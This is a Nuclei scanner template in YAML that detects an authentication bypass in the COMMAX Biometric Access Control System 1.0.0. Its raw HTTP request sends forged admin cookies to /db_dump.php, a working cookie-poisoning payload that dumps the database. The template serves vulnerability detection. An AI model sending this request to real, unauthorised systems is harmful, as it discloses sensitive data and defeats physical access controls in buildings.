36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: commax-biometric-auth-bypass
|
|
|
|
info:
|
|
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
|
|
author: gy741
|
|
severity: critical
|
|
description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50206
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
|
|
tags: commax,auth-bypass
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /db_dump.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: {{BaseURL}}/user_add.php
|
|
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "<title>::: COMMAX :::</title>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|